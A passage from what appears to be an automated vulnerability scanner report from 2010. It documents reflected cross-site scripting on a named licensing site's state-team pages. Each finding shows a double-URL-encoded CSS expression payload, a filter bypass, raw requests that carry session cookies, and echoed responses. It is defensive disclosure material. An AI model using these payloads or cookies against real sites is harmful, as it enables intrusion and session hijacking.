Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Delaware

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 328749590:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54505


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Delaware</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175361&e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1&e8bba%27style%3d%27x%3aexpression%28alert%281%29%29%27f6b9aaa7370=1&fromsla=T&e8bba'style='x:expression(alert(1))'f6b9aaa7370=1'>
...[SNIP]...

1.87. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Edmonton

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:44 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:43 GMT
NS_RTIMER_COMPOSITE: 1114188816:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87520


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Edmonton</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=260131&dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1&dbb0f%27style%3d%27x%3aexpression%28alert%281%29%29%27eba22f9b445=1&dbb0f'style='x:expression(alert(1))'eba22f9b445=1&fromsla=T'>
...[SNIP]...

1.88. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Florida

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:53 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -1699143552:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Florida</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175362&6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1&6608e'style='x:expression(alert(1))'462ed1390c5=1&6608e%27style%3d%27x%3aexpression%28alert%281%29%29%27462ed1390c5=1&fromsla=T'>
...[SNIP]...

1.89. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Georgia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: -811335755:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=972
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110892


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Georgia</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175363&cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1&cd6fd'style='x:expression(alert(1))'66d636fc045=1&cd6fd%27style%3d%27x%3aexpression%28alert%281%29%29%2766d636fc045=1&fromsla=T'>
...[SNIP]...

1.90. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Hawaii

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 334650841:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98513


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hawaii</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=259733&8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1&8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5=1&8d2a5%27style%3d%27x%3aexpression%28alert%281%29%29%278b5f9f5f3a5=1&fromsla=T'>
...[SNIP]...

1.91. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Idaho

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:07 GMT
NS_RTIMER_COMPOSITE: -1255238677:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=998
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 92858


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Idaho</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175364&1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1&1b675'style='x:expression(alert(1))'73c56e3d4b3=1&1b675%27style%3d%27x%3aexpression%28alert%281%29%29%2773c56e3d4b3=1&fromsla=T'>
...[SNIP]...

1.92. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Illinois

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:21 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
NS_RTIMER_COMPOSITE: 778553075:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=845
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111147


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Illinois</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175365&a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1&a8939%27style%3d%27x%3aexpression%28alert%281%29%29%27a322cf42a27=1&fromsla=T&a8939'style='x:expression(alert(1))'a322cf42a27=1'>
...[SNIP]...

1.93. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Indiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:15 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:13 GMT
NS_RTIMER_COMPOSITE: 2001998493:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110889


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Indiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175366&ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1&ddb83%27style%3d%27x%3aexpression%28alert%281%29%29%2731d9a9bbd80=1&ddb83'style='x:expression(alert(1))'31d9a9bbd80=1&fromsla=T'>
...[SNIP]...

1.94. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Iowa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:13 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:09 GMT
NS_RTIMER_COMPOSITE: -1590883224:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=973
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110110


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Iowa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175368&7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1&7a3d8%27style%3d%27x%3aexpression%28alert%281%29%29%2757114ddf99c=1&7a3d8'style='x:expression(alert(1))'57114ddf99c=1&fromsla=T'>
...[SNIP]...

1.95. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:06 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:04 GMT
NS_RTIMER_COMPOSITE: -1255239272:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=765
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kansas</title>


